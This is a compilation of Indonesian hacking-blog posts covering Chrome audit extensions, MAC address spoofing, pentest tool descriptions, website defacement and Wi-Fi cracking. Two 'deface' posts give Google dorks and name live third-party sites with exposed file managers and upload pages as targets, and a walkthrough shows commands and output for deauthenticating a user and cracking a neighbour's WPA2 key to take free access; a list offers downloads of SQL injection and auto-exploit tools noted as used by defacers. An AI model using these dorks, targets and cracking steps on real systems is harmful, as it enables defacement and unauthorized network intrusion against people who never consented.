Kemaren saya sudah share tentang Penetration Testing Concept, yang Insya Allah akan ada kelanjutannya dengan membahas masing-masing point yang sudah diterangkan. Namun sebelum itu, saya mau share dulu tentang Informasi yang saya dapatkan sebelum ini.
Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.
Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.
Silakan ditonton implementasinya pada video berikut: Disini
Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.
Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“. Silakan dilihat detailnya digambar berikut:
roadmap presented by vulnerabilitydatabase
Jika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.
Semoga informasi ini bermanfaat buat anda semua.
[ MAC Address ] Media Access Control ( MAC) Address biasanya digunakan sebagai sistem pemberian identitas dengan penomoran unik pada berbagai periferal jaringan. Sebagai contoh disini adalah kartu jaringan atau ethernet. Pada setiap ethernet pasti memiliki alamat MAC Address berbeda yang bersifat unik dan khas bahkan untuk tipe yang sama sekalipun pada setiap PC.
Berbeda dengan IP Address, MAC Address memiliki identitas yang unik dan dibuat secara permanen oleh si produsennya. Ini dimanfaatkan untuk berbagai keperluan authentication client pada suatu sistem server. Namun demikian pada beberapa kasus bisa membawa masalah bagi penggunanya, sebagai contoh seorang pengguna mengakses layanan Internet pada beberapa area Wi-fi hotspot yang mana layanan tersebut menggunakan proses authentication MAC Address.
Masalah akan muncul apabila ethernet card di PC rusak lalu diganti dengan yang baru, maka secara otomatis MAC Address-nya akan turut berubah. Untuk dapat mengkases kembali layanan tersebut pengguna harus melaporkan kembali MAC Address baru ke layanan penyelia Hospot. Sangat merepotkan bukan ?
Sekarang, Pernahkan Anda Mengalami Hal Ini?
Anda tidak bisa melakukan browsing karena MAC Address anda terdaftar di Blacklist?
Anda tidak bisa melakukan koneksi jaringan karena MAC Address anda tidak terdaftar?
Anda tidak bisa mengakses sebuah situs karena MAC Address anda ada di Squid list dan limited akses?
Berikut ini adalah cara yang dapat anda lakukan untuk merubah MAC Address anda
Mengganti MAC Address Ethernet Card Di Linux
Sebenarnya ada cara sederhana untuk mengatasi masalah ini yaitu dengan cara memodifikasi MAC Address sehingga ethernet card yang baru dilaporkan oleh sistem operasi seolah-olah memiliki MAC Address yang sama dengan ethernet card lama. Cara ini dikenal dengan juga sebagai spoofing MAC Address ini dapat kita lakukan dengan mudah dan cepat di sistem Linux.
Anda tidak perlu menggunakan tool tambahan, cukup dengan perintah internal ifconfig, perintahnya adalah sebagai berikut :
Kita coba dulu dengan perintah berikut untuk melihat MAC Address
$ ifconfig -a | grep HWaddr
eth0 Link encap:Ethernet HWaddr 00:80:48:BA:d1:20
Login sebagai root, ketikkan perintah berikut untuk merubah MAC Address
#ifconfig eth0 down #ifconfig eth0 hw ether 00:40:fe:e2:ae:4b #ifconfig eth0 up
Anda juga bisa mencoba cara berikut untuk pengguna Ubuntu:
$ ifconfig $ cd /etc/init.d $ sudo nano ChangeMAC Kemudian ganti konfigurasi, isi XX sesuai dengan keinginan sudo ifconfig eth1 down sudo ifconfig eth1 hw ether xx:xx:xx:xx:xx:xx sudo ifconfig eth1 up sudo /etc/init.d/networking stop sudo /etc/init.d/networking restart Simpan dan close filenya Kemudian jalankan perintah berikut dan restart ifconfig: $ sudo chmod +x ChangeMAC $ sudo update-rc.d ChangeMAC defaults
Untuk memeriksa MAC Address yang telah berubah, jalankan lagi perintah ifconfig.
Mengganti MAC Address Ethernet Card Di Windows
Pada sistem windows beberapa produsen ethernet card menyediakan fasilitas pergantian MAC Address melalui Device Manager Windows atau melalui akses registry yang sukar diingat. Namun ada cara yang sedikit berbeda dan mudah dilakukan, yaitu dengan sedikit bantuan tool yang diberi nama SMAC. yang ilustrasinya dapat dilihat pada gambar dibawah ini.
Jika anda berniat untuk merubah alamat MAC Address silahkan unduh toolnya pada link download dibawah ini:
Zed Attack Proxy (ZAP) adalah alat penetrasi testing terpadu untuk menemukan kerentanan dalam aplikasi web.
Hal ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman keamanan dan dengan demikian sangat ideal untuk para pengembang dan pentester yang baru untuk melakukan kegiatan pentest.
ZAP menyediakan scanner otomatis serta satu set alat yang memungkinkan untuk menemukan kerentanan keamanan website secara manual. Fitur-fitur yang ada di ZAP:
Process Hacker adalah software dengan fitur yang dikemas untuk memanipulasi proses dan service pada komputer. Process Hacker merupakan opensource dan gratis yang digunakan untuk menampilkan proses yang ada dikomputer dan editor memori dengan fitur-fitur unik seperti penjelasan berikut:
Processes
View processes in a tree view with highlighting
View detailed process statistics and performance graphs
Process tooltips are detailed and show context-specific information
Select multiple processes and terminate, suspend or resume them
(32-bit only) Bypass almost all forms of process protection
Assalamualaikum
Hallo sahabat Binus Hacker ? apa kabar nya ?
Okay pertemuan dengan saya kali ini akan memahas tentang hacking lagi
Yapz seputar deface.
Tak mau lama menunggu ? mari kita bahas ya bersama.
Google Dork:
- intitle: Ajex.FileManager
- inurl: /plugins/editors/AjexFileManager/ *Think it again Exploit:
- http://[localhost]/patch/plugins/editors/ajexfilemanager/index.html
Preview:
You can see if succses Live Target:
- http://fiesta-kurkino.ru/scripts/AjexFileManager/
- http://demphest.ru/demo/AjexFileManager/AjexFileManager/index.html
Note: Kembangkan ilmu yang kamu punya walaupun itu sedikit , jangan mudah menyerah untuk belajar
Greetz: Palembang Hacker | Binus Hacker | Bocah Nakal | Tria Wulandari | And all my friends :* |
Wassalamualaikum
Assalamualaikum
Hai ,apa kabar nya ? Hehe saya mau nulis lagi nih.
Okay masih seputar DEFACE, karena tidak ada bosan nya membahas yang satu ini
Untuk mempersingkat ? Mari kita bahas bersama. Dork: - inurl: upload.html site:wen.su
or Think it Live target:
- http://defcell21.wen.su/upload.html
- http://madiun.wen.su/upload/index.html
Okay, for preview your file ? http://[localhost]/pach/your file.
Cara penggunan nya sama seperi wen.ru.
Maaf dalam postingan kali ini saya tidak menggunakan snapshot.
Karena menurut saya ini sangatlah mudah dan simple
Yupz, batas segitu aja
Good Luck All ^_^ Greetz: Tria Wulandari | Palembang Hacker Link | Binus Hacker | Bl4nkc0de | AaEzha | Ichito Bandito | Kingdragrace | Chankunray | Canon | Blue | Marwanz | Dll haha
Wassalamualaikum
Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah) Download BackTrack 5 Disini: Download Wordlist John The Ripper Disini:
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya: root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:
root@binushacker:~# airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless
Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:
root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#
5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:
CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:
root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:
root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Untuk lebih detailnya, silakan lihat video di BinusHacker
Berikut ini adalah Download Hacking Tools, Hacking Tools 2012, Tool Hacking 2012, Cracking Tools 2012, Tool Cracking 2012 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2012. Happy Hacking All:
1. MySQL Password Auditor: Tools untuk melakukan audit / melakukan recovery password di MYSQL: Download MySQL Password Auditor
2. Mole SQL Injection: Tool yang biasa digunakan untuk melakukan SQL Injection di website, sangat mudah dan nyaman. Mole Untuk Windows & Mole Untuk Linux
3. X-SCAN: Tools ini digunakan untuk melakukan pengecekan vulnerability terhadap network. Download X-SCAN
4. SQLSUS SQL Injection: Ini adalah tools untuk melakukan SQL Injection juga, di buat dengan bahasa perl, jadi harus install perl untuk bisa menggunakan tools ini. DOWNLOAD SQLSUS
5. W3AF Web Application Attack and Audit Framework: Merupakan tool untuk melakukan attack dan audit terhadap aplikasi website, tool ini sangat populer saat ini. DOWNLOAD W3AF
6. DIR BUSTER: Merupakan tools untuk mencari nama directory dan nama file yang ada di website, tools ini sangat bermanfaat untuk mengetahui informasi halaman apa saja yang ada di website target. DOWNLOAD DIR BUSTER LINUX & DOWNLOAD DIR BUSTER WINDOWS
7. WINAUTOPWN: Merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server DOWNLOAD WINAUTOPWN MIRROR 1 atau WINDOWS AUTOPWN MIRROR 2
8. Multi Thread TCP Port Scanner: Tools untuk melakukan scanning port yang sedang digunakan dengan multi threading, sehingga bisa berbagai IP & Port yang bisa anda check. DOWNLOAD MT-TCP-SCAN
9. NetworkMiner: Merupakan tools untuk melakukan analysis network forensik untuk Windows, banyak di gunakan untuk mengawasi lalu lintas network. DOWNLOAD NETWORK MINER
10. RAR Password Cracker: Kebanyakan digunakan untuk melakukan crack terhadap RAR yang di password. DOWNLOAD RAR PASSWORD CRACKER
